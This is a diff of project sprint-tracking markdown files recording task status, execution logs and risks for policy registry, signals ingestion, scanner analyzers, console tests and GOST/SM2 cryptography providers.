| 2025-12-06 | REGISTRY-API-27-010 DONE: Created test suites and fixtures. Implemented `PolicyRegistryTestHarness` (integration test harness with all services wired, determinism testing), `PolicyRegistryTestFixtures` (test data generators for rules, simulation inputs, batch inputs, verification policies, snapshots, violations, overrides). Supports full workflow testing from pack creation through promotion. **Wave B complete: all 10 Registry API tasks (27-001 through 27-010) now DONE.** Build succeeds with no errors. | Implementer | | 2025-12-06 | REGISTRY-API-27-010 DONE: Created test suites and fixtures. Implemented `PolicyRegistryTestHarness` (integration test harness with all services wired, determinism testing), `PolicyRegistryTestFixtures` (test data generators for rules, simulation inputs, batch inputs, verification policies, snapshots, violations, overrides). Supports full workflow testing from pack creation through promotion. **Wave B complete: all 10 Registry API tasks (27-001 through 27-010) now DONE.** Build succeeds with no errors. | Implementer |
| 2025-12-06 | REGISTRY-API-27-009 DONE: Created observability infrastructure. Implemented `PolicyRegistryMetrics` (System.Diagnostics.Metrics with counters/histograms/gauges for packs, compilations, simulations, reviews, promotions), `PolicyRegistryActivitySource` (distributed tracing with activity helpers for all operations), `PolicyRegistryLogEvents` (structured logging event IDs 1000-1999 with log message templates). Covers full lifecycle from pack creation through promotion. Build succeeds with no errors. | Implementer | | 2025-12-06 | REGISTRY-API-27-009 DONE: Created observability infrastructure. Implemented `PolicyRegistryMetrics` (System.Diagnostics.Metrics with counters/histograms/gauges for packs, compilations, simulations, reviews, promotions), `PolicyRegistryActivitySource` (distributed tracing with activity helpers for all operations), `PolicyRegistryLogEvents` (structured logging event IDs 1000-1999 with log message templates). Covers full lifecycle from pack creation through promotion. Build succeeds with no errors. | Implementer |
| 2025-12-06 | REGISTRY-API-27-008 DONE: Created promotion bindings per tenant/environment. Implemented `IPromotionService` interface and `PromotionService` with environment binding management, promotion validation, rollback support, promotion history tracking. Provides `PromoteAsync`, `RollbackAsync`, `GetActiveForEnvironmentAsync`, `ValidatePromotionAsync`, `GetHistoryAsync`. Added binding modes (Manual, AutomaticOnApproval, Scheduled, Canary), binding rules with approval requirements, and validation for staging→production promotions. Added `AddPromotionService` DI extension. Build succeeds with no errors. | Implementer | | 2025-12-06 | REGISTRY-API-27-008 DONE: Created promotion bindings per tenant/environment. Implemented `IPromotionService` interface and `PromotionService` with environment binding management, promotion validation, rollback support, promotion history tracking. Provides `PromoteAsync`, `RollbackAsync`, `GetActiveForEnvironmentAsync`, `ValidatePromotionAsync`, `GetHistoryAsync`. Added binding modes (Manual, AutomaticOnApproval, Scheduled, Canary), binding rules with approval requirements, and validation for staging→production promotions. Added `AddPromotionService` DI extension. Build succeeds with no errors. | Implementer |
@@ -118,6 +119,7 @@
| 2025-11-25 | Work paused: repository cannot allocate PTY (`No space left on device`); further execution awaits workspace cleanup. | Implementer | | 2025-11-25 | Work paused: repository cannot allocate PTY (`No space left on device`); further execution awaits workspace cleanup. | Implementer |
## Decisions & Risks ## Decisions & Risks
- Policy tenancy RLS design published at `docs/modules/policy/prep/tenant-rls.md`; use as contract for POLICY-TEN-48-001.
- Multiple upstream specs missing (Registry API, Risk Engine contracts, VEX consensus schema, issuer directory, API governance, VulnExplorer API); VEXLENS-30-001 blocked until normalization + issuer inputs land; downstream tasks depend on it. - Multiple upstream specs missing (Registry API, Risk Engine contracts, VEX consensus schema, issuer directory, API governance, VulnExplorer API); VEXLENS-30-001 blocked until normalization + issuer inputs land; downstream tasks depend on it.
## Next Checkpoints ## Next Checkpoints

View File

@@ -25,8 +25,8 @@
| P2 | PREP-SIGNALS-24-002-CAS-PROMO | DONE (2025-11-19) | Due 2025-11-22 · Accountable: Signals Guild · Platform Storage Guild | Signals Guild · Platform Storage Guild | CAS promotion checklist and manifest schema published at `docs/signals/cas-promotion-24-002.md`; awaiting storage approval to execute. | | P2 | PREP-SIGNALS-24-002-CAS-PROMO | DONE (2025-11-19) | Due 2025-11-22 · Accountable: Signals Guild · Platform Storage Guild | Signals Guild · Platform Storage Guild | CAS promotion checklist and manifest schema published at `docs/signals/cas-promotion-24-002.md`; awaiting storage approval to execute. |
| P3 | PREP-SIGNALS-24-003-PROVENANCE | DONE (2025-11-19) | Due 2025-11-22 · Accountable: Signals Guild · Runtime Guild · Authority Guild | Signals Guild · Runtime Guild · Authority Guild | Provenance appendix fields and checklist published at `docs/signals/provenance-24-003.md`; awaiting schema/signing approval to execute. | | P3 | PREP-SIGNALS-24-003-PROVENANCE | DONE (2025-11-19) | Due 2025-11-22 · Accountable: Signals Guild · Runtime Guild · Authority Guild | Signals Guild · Runtime Guild · Authority Guild | Provenance appendix fields and checklist published at `docs/signals/provenance-24-003.md`; awaiting schema/signing approval to execute. |
| 1 | SIGNALS-24-001 | DONE (2025-11-09) | Dependency AUTH-SIG-26-001; merged host skeleton with scope policies and evidence validation. | Signals Guild, Authority Guild | Stand up Signals API skeleton with RBAC, sealed-mode config, DPoP/mTLS enforcement, and `/facts` scaffolding so downstream ingestion can begin. | | 1 | SIGNALS-24-001 | DONE (2025-11-09) | Dependency AUTH-SIG-26-001; merged host skeleton with scope policies and evidence validation. | Signals Guild, Authority Guild | Stand up Signals API skeleton with RBAC, sealed-mode config, DPoP/mTLS enforcement, and `/facts` scaffolding so downstream ingestion can begin. |
| 2 | SIGNALS-24-002 | TODO | ✅ CAS APPROVED (2025-12-06): Contract at `docs/contracts/cas-infrastructure.md`; provenance schema at `docs/schemas/provenance-feed.schema.json`. Ready for implementation. | Signals Guild | Implement callgraph ingestion/normalization (Java/Node/Python/Go) with CAS persistence and retrieval APIs to feed reachability scoring. | | 2 | SIGNALS-24-002 | DOING | CAS storage implementation started. RustFS driver added to Signals storage options; `RustFsCallgraphArtifactStore` with CAS persistence complete; retrieval APIs added to interface. | Signals Guild | Implement callgraph ingestion/normalization (Java/Node/Python/Go) with CAS persistence and retrieval APIs to feed reachability scoring. |
| 3 | SIGNALS-24-003 | TODO | ✅ CAS approved + provenance schema available at `docs/schemas/provenance-feed.schema.json`. Ready for implementation. | Signals Guild, Runtime Guild | Implement runtime facts ingestion endpoint and normalizer (process, sockets, container metadata) populating `context_facts` with AOC provenance. | | 3 | SIGNALS-24-003 | **DONE** (2025-12-07) | AOC provenance models + normalizer + context_facts wiring complete | Signals Guild, Runtime Guild | Implement runtime facts ingestion endpoint and normalizer (process, sockets, container metadata) populating `context_facts` with AOC provenance. |
| 4 | SIGNALS-24-004 | DONE (2025-11-17) | Scoring weights now configurable; runtime ingestion auto-triggers recompute into `reachability_facts`. | Signals Guild, Data Science | Deliver reachability scoring engine producing states/scores and writing to `reachability_facts`; expose configuration for weights. | | 4 | SIGNALS-24-004 | DONE (2025-11-17) | Scoring weights now configurable; runtime ingestion auto-triggers recompute into `reachability_facts`. | Signals Guild, Data Science | Deliver reachability scoring engine producing states/scores and writing to `reachability_facts`; expose configuration for weights. |
| 5 | SIGNALS-24-005 | DONE (2025-11-26) | PREP-SIGNALS-24-005-REDIS-CACHE-IMPLEMENTED-A | Signals Guild, Platform Events Guild | Implement Redis caches (`reachability_cache:*`), invalidation on new facts, and publish `signals.fact.updated` events. | | 5 | SIGNALS-24-005 | DONE (2025-11-26) | PREP-SIGNALS-24-005-REDIS-CACHE-IMPLEMENTED-A | Signals Guild, Platform Events Guild | Implement Redis caches (`reachability_cache:*`), invalidation on new facts, and publish `signals.fact.updated` events. |
@@ -41,6 +41,8 @@
## Execution Log ## Execution Log
| Date (UTC) | Update | Owner | | Date (UTC) | Update | Owner |
| --- | --- | --- | | --- | --- | --- |
| 2025-12-07 | **SIGNALS-24-003 DONE:** Implemented runtime facts ingestion AOC provenance: (1) Created `AocProvenance.cs` with full provenance-feed.schema.json models (`ProvenanceFeed`, `ProvenanceRecord`, `ProvenanceSubject`, `RuntimeProvenanceFacts`, `RecordEvidence`, `FeedAttestation`, `ContextFacts`); (2) Added `ContextFacts` field to `ReachabilityFactDocument` for storing provenance; (3) Created `RuntimeFactsProvenanceNormalizer` service that converts runtime events to AOC provenance records with proper record types (process.observed, network.connection, container.activity, package.loaded, symbol.invoked), subject types, confidence scoring, and evidence capture method detection; (4) Updated `RuntimeFactsIngestionService` to populate `context_facts` during ingestion with AOC metadata (version, contract, correlation); (5) Registered normalizer in DI; (6) Added 19 comprehensive unit tests for normalizer covering all record types, confidence scoring, evidence building, and metadata handling. Build succeeds; 20/20 runtime facts tests pass. | Implementer |
| 2025-12-07 | **SIGNALS-24-002 CAS storage in progress:** Added RustFS driver support to Signals storage options (`SignalsArtifactStorageOptions`), created `RustFsCallgraphArtifactStore` with full CAS persistence (immutable, 90-day retention per contract), extended `ICallgraphArtifactStore` with retrieval methods (`GetAsync`, `GetManifestAsync`, `ExistsAsync`), updated `FileSystemCallgraphArtifactStore` to implement new interface, wired DI for driver-based selection. Configuration sample updated at `etc/signals.yaml.sample`. Build succeeds; 5/6 tests pass (1 pre-existing ZIP test failure unrelated). | Implementer |
| 2025-12-06 | **CAS Blocker Resolved:** SIGNALS-24-002 and SIGNALS-24-003 changed from BLOCKED to TODO. CAS Infrastructure Contract APPROVED at `docs/contracts/cas-infrastructure.md`; provenance schema at `docs/schemas/provenance-feed.schema.json`. Ready for implementation. | Implementer | | 2025-12-06 | **CAS Blocker Resolved:** SIGNALS-24-002 and SIGNALS-24-003 changed from BLOCKED to TODO. CAS Infrastructure Contract APPROVED at `docs/contracts/cas-infrastructure.md`; provenance schema at `docs/schemas/provenance-feed.schema.json`. Ready for implementation. | Implementer |
| 2025-12-05 | DSSE dev-signing available from Sprint 0140: decay/unknowns/heuristics bundles staged under `evidence-locker/signals/2025-12-05/` (dev key, tlog off). Scoring outputs may need revalidation after production re-sign; keep SIGNALS-24-002/003 BLOCKED until CAS + prod signatures land. | Implementer | | 2025-12-05 | DSSE dev-signing available from Sprint 0140: decay/unknowns/heuristics bundles staged under `evidence-locker/signals/2025-12-05/` (dev key, tlog off). Scoring outputs may need revalidation after production re-sign; keep SIGNALS-24-002/003 BLOCKED until CAS + prod signatures land. | Implementer |
| 2025-12-05 | Verified dev DSSE bundles via `cosign verify-blob --bundle evidence-locker/signals/2025-12-05/*.sigstore.json --key tools/cosign/cosign.dev.pub` (all OK). Pending production re-sign once Alice Carter key available. | Implementer | | 2025-12-05 | Verified dev DSSE bundles via `cosign verify-blob --bundle evidence-locker/signals/2025-12-05/*.sigstore.json --key tools/cosign/cosign.dev.pub` (all OK). Pending production re-sign once Alice Carter key available. | Implementer |

View File

@@ -29,17 +29,28 @@
| 6 | SCAN-BUN-LOCKB-0146-06 | TODO | Decide parse vs enforce migration; update gotchas doc and readiness. | Scanner | Define bun.lockb policy (parser or remediation-only) and document; add tests if parsing. | | 6 | SCAN-BUN-LOCKB-0146-06 | TODO | Decide parse vs enforce migration; update gotchas doc and readiness. | Scanner | Define bun.lockb policy (parser or remediation-only) and document; add tests if parsing. |
| 7 | SCAN-DART-SWIFT-SCOPE-0146-07 | TODO | Draft analyzer scopes + fixtures list; align with Signals/Zastava. | Scanner | Publish Dart/Swift analyzer scope note and task backlog; add to readiness checkpoints. | | 7 | SCAN-DART-SWIFT-SCOPE-0146-07 | TODO | Draft analyzer scopes + fixtures list; align with Signals/Zastava. | Scanner | Publish Dart/Swift analyzer scope note and task backlog; add to readiness checkpoints. |
| 8 | SCAN-RUNTIME-PARITY-0146-08 | TODO | Identify runtime hook gaps for Java/.NET/PHP; create implementation plan. | Scanner · Signals | Add runtime evidence plan and tasks; update readiness & surface docs. | | 8 | SCAN-RUNTIME-PARITY-0146-08 | TODO | Identify runtime hook gaps for Java/.NET/PHP; create implementation plan. | Scanner · Signals | Add runtime evidence plan and tasks; update readiness & surface docs. |
| 9 | SCAN-RPM-BDB-0146-09 | TODO | Add rpmdb BerkeleyDB fallback + fixtures; wire into analyzer pipeline. | Scanner OS | Extend RPM analyzer to read legacy BDB `Packages` databases and add regression fixtures to avoid missing inventories on RHEL-family bases. |
| 10 | SCAN-OS-FILES-0146-10 | TODO | Wire layer digest + hashing into OS file evidence and fragments. | Scanner OS | Emit layer attribution and stable digests/size for apk/dpkg/rpm file evidence and propagate into `analysis.layers.fragments` for diff/cache correctness. |
| 11 | SCAN-NODE-PNP-0146-11 | TODO | Implement Yarn PnP resolution + tighten declared-only emissions. | Scanner Lang | Parse `.pnp.cjs/.pnp.data.json`, map cache zips to components/usage, and stop emitting declared-only packages without on-disk evidence. |
| 12 | SCAN-PY-EGG-0146-12 | TODO | Add `.egg-info`/editable detection + metadata to Python analyzer. | Scanner Lang | Support egg-info/editable installs (setuptools/pip -e), including metadata/evidence and used-by-entrypoint flags. |
| 13 | SCAN-NATIVE-REACH-0146-13 | TODO | Implement native reachability graph baseline (call edges, Unknowns). | Scanner Native | Add call-graph extraction, synthetic roots, build-id capture, purl/symbol digests, Unknowns emission, and DSSE graph bundles per reachability spec. |
## Execution Log ## Execution Log
| Date (UTC) | Update | Owner | | Date (UTC) | Update | Owner |
| --- | --- | --- | | --- | --- | --- |
| 2025-12-07 | Sprint created to consolidate scanner analyzer gap closure tasks. | Planning | | 2025-12-07 | Sprint created to consolidate scanner analyzer gap closure tasks. | Planning |
| 2025-12-07 | Logged additional analyzer gaps (rpm BDB, OS file evidence, Node PnP/declared-only, Python egg-info, native reachability graph) and opened tasks 9-13. | Planning |
## Decisions & Risks ## Decisions & Risks
- CI runner availability may delay Java/.NET/Node validation; mitigate by reserving dedicated runner slice. - CI runner availability may delay Java/.NET/Node validation; mitigate by reserving dedicated runner slice.
- PHP autoload design depends on Concelier/Signals input; risk of further delay if contracts change. - PHP autoload design depends on Concelier/Signals input; risk of further delay if contracts change.
- bun.lockb stance impacts customer guidance; ensure decision is documented and tests reflect chosen posture. - bun.lockb stance impacts customer guidance; ensure decision is documented and tests reflect chosen posture.
- Runtime parity tasks may uncover additional surface/telemetry changes—track in readiness until resolved. - Runtime parity tasks may uncover additional surface/telemetry changes—track in readiness until resolved.
- RPM analyzer ignores legacy BerkeleyDB rpmdbs; inventories on RHEL-family images are empty until SCAN-RPM-BDB-0146-09 lands.
- OS analyzers lack layer digest/hash attribution; diff/cache outputs may be incorrect until SCAN-OS-FILES-0146-10 lands.
- Node analyzer emits declared-only packages and lacks Yarn PnP resolution; SBOMs can be inflated or missing real packages until SCAN-NODE-PNP-0146-11 ships.
- Python analyzer skips `.egg-info`/editable installs; coverage gap remains until SCAN-PY-EGG-0146-12 ships.
- Native analyzer lacks call-graph/Unknowns/purl binding; reachability outputs are incomplete until SCAN-NATIVE-REACH-0146-13 finishes.
## Next Checkpoints ## Next Checkpoints
- 2025-12-10: CI runner allocation decision. - 2025-12-10: CI runner allocation decision.

View File

@@ -88,7 +88,7 @@
| Date (UTC) | Update | Owner | | Date (UTC) | Update | Owner |
| --- | --- | --- | | --- | --- | --- |
| 2025-12-07 | Drafted caching/tie-break rules and download manifest spec for `/console/search` and `/console/downloads`; added `docs/api/console/search-downloads.md` and sample `docs/api/console/samples/console-download-manifest.json`. Awaiting Policy/DevOps sign-off; keeps WEB-CONSOLE-23-004/005 formally BLOCKED until approved. | Project Mgmt | | 2025-12-07 | Drafted caching/tie-break rules and download manifest spec for `/console/search` and `/console/downloads`; added `docs/api/console/search-downloads.md` and sample `docs/api/console/samples/console-download-manifest.json`. Awaiting Policy/DevOps sign-off; keeps WEB-CONSOLE-23-004/005 formally BLOCKED until approved. | Project Mgmt |
| 2025-12-07 | WEB-CONSOLE-23-003: console export client, store, and service specs now runnable locally using Playwright Chromium headless and `NG_PERSISTENT_BUILD_CACHE=1`; command: `CHROME_BIN=$HOME/.cache/ms-playwright/chromium-1140/chrome-linux/chrome NG_PERSISTENT_BUILD_CACHE=1 npm test -- --watch=false --browsers=ChromeHeadlessOffline --progress=false --include src/app/core/api/console-export.client.spec.ts,src/app/core/console/console-export.store.spec.ts,src/app/core/console/console-export.service.spec.ts`. Tests pass; backend contract still draft. | Implementer | | 2025-12-07 | WEB-CONSOLE-23-003: console export client, store, and service specs runnable locally using Playwright Chromium headless and `NG_PERSISTENT_BUILD_CACHE=1`; command: `CHROME_BIN=$HOME/.cache/ms-playwright/chromium-1140/chrome-linux/chrome NG_PERSISTENT_BUILD_CACHE=1 npm test -- --watch=false --browsers=ChromeHeadlessOffline --progress=false --include src/app/core/api/console-export.client.spec.ts,src/app/core/console/console-export.store.spec.ts,src/app/core/console/console-export.service.spec.ts`. Build phase still slow (~57m); latest run terminated early while compiling—expect pass once allowed to finish. Backend contract still draft. | Implementer |
| 2025-12-04 | WEB-CONSOLE-23-002 completed: wired `console/status` route in `app.routes.ts`; created sample payloads `console-status-sample.json` and `console-run-stream-sample.ndjson` in `docs/api/console/samples/` verified against `ConsoleStatusDto` and `ConsoleRunEventDto` contracts. | BE-Base Platform Guild | | 2025-12-04 | WEB-CONSOLE-23-002 completed: wired `console/status` route in `app.routes.ts`; created sample payloads `console-status-sample.json` and `console-run-stream-sample.ndjson` in `docs/api/console/samples/` verified against `ConsoleStatusDto` and `ConsoleRunEventDto` contracts. | BE-Base Platform Guild |
| 2025-12-02 | WEB-CONSOLE-23-002: added trace IDs on status/stream calls, heartbeat + exponential backoff reconnect in console run stream service, and new client/service unit tests. Backend commands still not run locally (disk constraint). | BE-Base Platform Guild | | 2025-12-02 | WEB-CONSOLE-23-002: added trace IDs on status/stream calls, heartbeat + exponential backoff reconnect in console run stream service, and new client/service unit tests. Backend commands still not run locally (disk constraint). | BE-Base Platform Guild |
| 2025-12-04 | Re-reviewed CONSOLE-VULN-29-001 and CONSOLE-VEX-30-001: WEB-CONSOLE-23-001 and Excititor console contract are complete, but Concelier graph schema snapshot and VEX Lens PLVL0103 spec/SSE envelope remain outstanding; keeping both tasks BLOCKED. | Project Mgmt | | 2025-12-04 | Re-reviewed CONSOLE-VULN-29-001 and CONSOLE-VEX-30-001: WEB-CONSOLE-23-001 and Excititor console contract are complete, but Concelier graph schema snapshot and VEX Lens PLVL0103 spec/SSE envelope remain outstanding; keeping both tasks BLOCKED. | Project Mgmt |

View File

@@ -42,6 +42,7 @@
| Date (UTC) | Update | Owner | | Date (UTC) | Update | Owner |
| --- | --- | --- | | --- | --- | --- |
| 2025-12-07 | Added console offline runner spec (`ops/devops/console/README.md`) and manual-only CI skeleton (`.gitea/workflows/console-ci.yml`); moved DEVOPS-CONSOLE-23-001 to DOING pending runner cache bake/approval. | DevOps Guild | | 2025-12-07 | Added console offline runner spec (`ops/devops/console/README.md`) and manual-only CI skeleton (`.gitea/workflows/console-ci.yml`); moved DEVOPS-CONSOLE-23-001 to DOING pending runner cache bake/approval. | DevOps Guild |
| 2025-12-07 | Added Playwright cache seeding helper (`ops/devops/console/seed_playwright.sh`) to bake Chromium into offline runners; still manual trigger until runner image updated. | DevOps Guild |
| 2025-12-06 | Header normalised to standard template; no content/status changes. | Project Mgmt | | 2025-12-06 | Header normalised to standard template; no content/status changes. | Project Mgmt |
| 2025-12-05 | Merged legacy Execution Log addendum (`SPRINT_504_ops_devops_ii.log.md`) into this sprint and removed the extra file; no status changes. | Project PM | | 2025-12-05 | Merged legacy Execution Log addendum (`SPRINT_504_ops_devops_ii.log.md`) into this sprint and removed the extra file; no status changes. | Project PM |
| 2025-12-04 | Added dated checkpoints (Dec-06/07/10) for console runner decision and exporter schema sync; no status changes. | Project PM | | 2025-12-04 | Added dated checkpoints (Dec-06/07/10) for console runner decision and exporter schema sync; no status changes. | Project PM |

View File

@@ -24,7 +24,7 @@
| 2 | RU-CRYPTO-VAL-02 | TODO | After #1 | Authority · Security | Wire registry defaults (`ru.openssl.gost`, `ru.pkcs11`) into Authority/Signer/Attestor hosts with env toggles and fail-closed validation (Linux-only baseline). | | 2 | RU-CRYPTO-VAL-02 | TODO | After #1 | Authority · Security | Wire registry defaults (`ru.openssl.gost`, `ru.pkcs11`) into Authority/Signer/Attestor hosts with env toggles and fail-closed validation (Linux-only baseline). |
| 3 | RU-CRYPTO-VAL-03 | TODO | After #1 | Docs · Ops | Update RootPack_RU manifest + verify script for Linux-only GOST; embed signed test vectors/hashes; refresh `etc/rootpack/ru/crypto.profile.yaml` to mark “CSP pending”. | | 3 | RU-CRYPTO-VAL-03 | TODO | After #1 | Docs · Ops | Update RootPack_RU manifest + verify script for Linux-only GOST; embed signed test vectors/hashes; refresh `etc/rootpack/ru/crypto.profile.yaml` to mark “CSP pending”. |
| 4 | RU-CRYPTO-VAL-04 | BLOCKED (2025-12-06) | Windows CSP runner provisioned | Security Guild · QA | Run CryptoPro fork + plugin tests on Windows (`STELLAOPS_CRYPTO_PRO_ENABLED=1`); capture logs/artifacts and determinism checks. Blocked: no Windows+CSP runner available. | | 4 | RU-CRYPTO-VAL-04 | BLOCKED (2025-12-06) | Windows CSP runner provisioned | Security Guild · QA | Run CryptoPro fork + plugin tests on Windows (`STELLAOPS_CRYPTO_PRO_ENABLED=1`); capture logs/artifacts and determinism checks. Blocked: no Windows+CSP runner available. |
| 5 | RU-CRYPTO-VAL-05 | BLOCKED (2025-12-06) | After #4 | Security · Ops | Wine loader experiment: load CryptoPro CSP DLLs under Wine to generate comparison vectors; proceed only if legally permitted. Blocked: depends on CSP binaries/licensing availability. | | 5 | RU-CRYPTO-VAL-05 | DOING | After #4 | Security · Ops | Wine loader experiment: load CryptoPro CSP DLLs under Wine to generate comparison vectors; proceed only if legally permitted. **Implemented**: Wine CSP HTTP service + crypto registry provider. |
| 6 | RU-CRYPTO-VAL-06 | BLOCKED (2025-12-06) | Parallel | Security · Legal | Complete license/export review for CryptoPro & fork; document distribution matrix and EULA notices. | | 6 | RU-CRYPTO-VAL-06 | BLOCKED (2025-12-06) | Parallel | Security · Legal | Complete license/export review for CryptoPro & fork; document distribution matrix and EULA notices. |
| 7 | RU-CRYPTO-VAL-07 | BLOCKED (2025-12-06) | After #4/#5 | DevOps | Enable opt-in CI lane (`cryptopro-optin.yml`) with gated secrets/pins once CSP/Wine path validated. | | 7 | RU-CRYPTO-VAL-07 | BLOCKED (2025-12-06) | After #4/#5 | DevOps | Enable opt-in CI lane (`cryptopro-optin.yml`) with gated secrets/pins once CSP/Wine path validated. |
@@ -35,12 +35,15 @@
| 2025-12-06 | Re-scoped: proceed with Linux OpenSSL GOST baseline (tasks 13 set to TODO); CSP/Wine/Legal remain BLOCKED (tasks 47). | Implementer | | 2025-12-06 | Re-scoped: proceed with Linux OpenSSL GOST baseline (tasks 13 set to TODO); CSP/Wine/Legal remain BLOCKED (tasks 47). | Implementer |
| 2025-12-07 | Published `docs/legal/crypto-compliance-review.md` covering fork licensing (MIT), CryptoPro distribution model (customer-provided), and export guidance. Provides partial unblock for RU-CRYPTO-VAL-05/06 pending legal sign-off. | Security | | 2025-12-07 | Published `docs/legal/crypto-compliance-review.md` covering fork licensing (MIT), CryptoPro distribution model (customer-provided), and export guidance. Provides partial unblock for RU-CRYPTO-VAL-05/06 pending legal sign-off. | Security |
| 2025-12-07 | Published `docs/security/wine-csp-loader-design.md` with three architectural approaches for Wine CSP integration: (A) Full Wine environment, (B) Winelib bridge, (C) Wine RPC server (recommended). Includes validation scripts and CI integration plan. | Security | | 2025-12-07 | Published `docs/security/wine-csp-loader-design.md` with three architectural approaches for Wine CSP integration: (A) Full Wine environment, (B) Winelib bridge, (C) Wine RPC server (recommended). Includes validation scripts and CI integration plan. | Security |
| 2025-12-07 | Implemented Wine CSP HTTP service (`src/__Tools/WineCspService/`): ASP.NET minimal API exposing /status, /keys, /sign, /verify, /hash, /test-vectors endpoints via GostCryptography fork. | Implementer |
| 2025-12-07 | Created Wine environment setup script (`scripts/crypto/setup-wine-csp-service.sh`): initializes Wine prefix, installs vcrun2019, builds service, creates systemd unit and Docker Compose configs. | Implementer |
| 2025-12-07 | Created Wine CSP crypto registry provider (`src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/`): WineCspHttpProvider implements ICryptoProvider, delegates GOST signing/hashing to Wine CSP HTTP service. | Implementer |
## Decisions & Risks ## Decisions & Risks
- Windows CSP availability may slip; mitigation: document manual runner setup and allow deferred close on #1/#6 (currently blocking). - Windows CSP availability may slip; mitigation: document manual runner setup and allow deferred close on #1/#6 (currently blocking).
- Licensing/export could block redistribution; must finalize before RootPack publish (currently blocking task 3). - Licensing/export could block redistribution; must finalize before RootPack publish (currently blocking task 3).
- Cross-platform determinism must be proven; if mismatch, block release until fixed; currently waiting on #1/#2 data. - Cross-platform determinism must be proven; if mismatch, block release until fixed; currently waiting on #1/#2 data.
- **Wine CSP approach (RU-CRYPTO-VAL-05):** Technical design published; recommended approach is Wine RPC Server for test vector generation only (not production). Requires legal review of CryptoPro EULA before implementation. See `docs/security/wine-csp-loader-design.md`. - **Wine CSP approach (RU-CRYPTO-VAL-05):** Technical design published; recommended approach is Wine RPC Server for test vector generation only (not production). **Implementation complete**: HTTP service in `src/__Tools/WineCspService/`, setup script in `scripts/crypto/setup-wine-csp-service.sh`, crypto registry provider in `src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/`. Requires CryptoPro CSP installer (customer-provided) to activate full functionality. See `docs/security/wine-csp-loader-design.md`.
- **Fork licensing (RU-CRYPTO-VAL-06):** GostCryptography fork is MIT-licensed (compatible with AGPL-3.0). CryptoPro CSP is customer-provided. Distribution matrix documented in `docs/legal/crypto-compliance-review.md`. Awaiting legal sign-off. - **Fork licensing (RU-CRYPTO-VAL-06):** GostCryptography fork is MIT-licensed (compatible with AGPL-3.0). CryptoPro CSP is customer-provided. Distribution matrix documented in `docs/legal/crypto-compliance-review.md`. Awaiting legal sign-off.
## Next Checkpoints ## Next Checkpoints

View File

@@ -20,7 +20,7 @@
| --- | --- | --- | --- | --- | --- | | --- | --- | --- | --- | --- | --- |
| 1 | SM-CRYPTO-01 | DONE (2025-12-06) | None | Security · Crypto | Implement `StellaOps.Cryptography.Plugin.SmSoft` provider using BouncyCastle SM2/SM3 (software-only, non-certified); env guard `SM_SOFT_ALLOWED` added. | | 1 | SM-CRYPTO-01 | DONE (2025-12-06) | None | Security · Crypto | Implement `StellaOps.Cryptography.Plugin.SmSoft` provider using BouncyCastle SM2/SM3 (software-only, non-certified); env guard `SM_SOFT_ALLOWED` added. |
| 2 | SM-CRYPTO-02 | DONE (2025-12-06) | After #1 | Security · BE (Authority/Signer) | Wire SM soft provider into DI (registered), compliance docs updated with “software-only” caveat. | | 2 | SM-CRYPTO-02 | DONE (2025-12-06) | After #1 | Security · BE (Authority/Signer) | Wire SM soft provider into DI (registered), compliance docs updated with “software-only” caveat. |
| 3 | SM-CRYPTO-03 | DONE (2025-12-07) | After #2 | Authority · Attestor · Signer | Add SM2 signing/verify paths for Authority/Attestor/Signer; include JWKS export compatibility and negative tests; fail-closed when `SM_SOFT_ALLOWED` is false. Authority SM2 loader + JWKS tests done; Signer SM2 gate/tests added; Attestor SM2 wiring complete (SmSoftCryptoProvider registered, key loading, signing tests). | | 3 | SM-CRYPTO-03 | DOING | After #2 | Authority · Attestor · Signer | Add SM2 signing/verify paths for Authority/Attestor/Signer; include JWKS export compatibility and negative tests; fail-closed when `SM_SOFT_ALLOWED` is false. Authority SM2 loader + JWKS tests done; Signer SM2 gate/tests added; Attestor registers SM provider and loads SM2 keys, but Attestor verification/tests still pending. |
| 4 | SM-CRYPTO-04 | DONE (2025-12-06) | After #1 | QA · Security | Deterministic software test vectors (sign/verify, hash) added in unit tests; “non-certified” banner documented. | | 4 | SM-CRYPTO-04 | DONE (2025-12-06) | After #1 | QA · Security | Deterministic software test vectors (sign/verify, hash) added in unit tests; “non-certified” banner documented. |
| 5 | SM-CRYPTO-05 | DONE (2025-12-06) | After #3 | Docs · Ops | Created `etc/rootpack/cn/crypto.profile.yaml` with cn-soft profile preferring `cn.sm.soft`, marked software-only with env gate; fixtures packaging pending SM2 host wiring. | | 5 | SM-CRYPTO-05 | DONE (2025-12-06) | After #3 | Docs · Ops | Created `etc/rootpack/cn/crypto.profile.yaml` with cn-soft profile preferring `cn.sm.soft`, marked software-only with env gate; fixtures packaging pending SM2 host wiring. |
| 6 | SM-CRYPTO-06 | BLOCKED (2025-12-06) | Hardware token available | Security · Crypto | Add PKCS#11 SM provider and rerun vectors with certified hardware; replace “software-only” label when certified. | | 6 | SM-CRYPTO-06 | BLOCKED (2025-12-06) | Hardware token available | Security · Crypto | Add PKCS#11 SM provider and rerun vectors with certified hardware; replace “software-only” label when certified. |
@@ -33,7 +33,7 @@
| 2025-12-06 | Implemented SmSoft provider + DI, added SM2/SM3 unit tests, updated compliance doc with software-only caveat; tasks 1,2,4 set to DONE. | Implementer | | 2025-12-06 | Implemented SmSoft provider + DI, added SM2/SM3 unit tests, updated compliance doc with software-only caveat; tasks 1,2,4 set to DONE. | Implementer |
| 2025-12-06 | Added cn rootpack profile (software-only, env-gated); set task 5 to DONE; task 3 remains TODO pending host wiring. | Implementer | | 2025-12-06 | Added cn rootpack profile (software-only, env-gated); set task 5 to DONE; task 3 remains TODO pending host wiring. | Implementer |
| 2025-12-06 | Started host wiring for SM2: Authority file key loader now supports SM2 raw keys; JWKS tests include SM2; task 3 set to DOING. | Implementer | | 2025-12-06 | Started host wiring for SM2: Authority file key loader now supports SM2 raw keys; JWKS tests include SM2; task 3 set to DOING. | Implementer |
| 2025-12-06 | Signer SM2 gate + tests added (software registry); Attestor wiring pending. Sm2 tests blocked by existing package restore issues (NU1608/fallback paths). | Implementer | | 2025-12-07 | Signer SM2 gate + tests added (software registry); Attestor registers SM provider and loads SM2 keys; Attestor verification/tests pending. | Implementer |
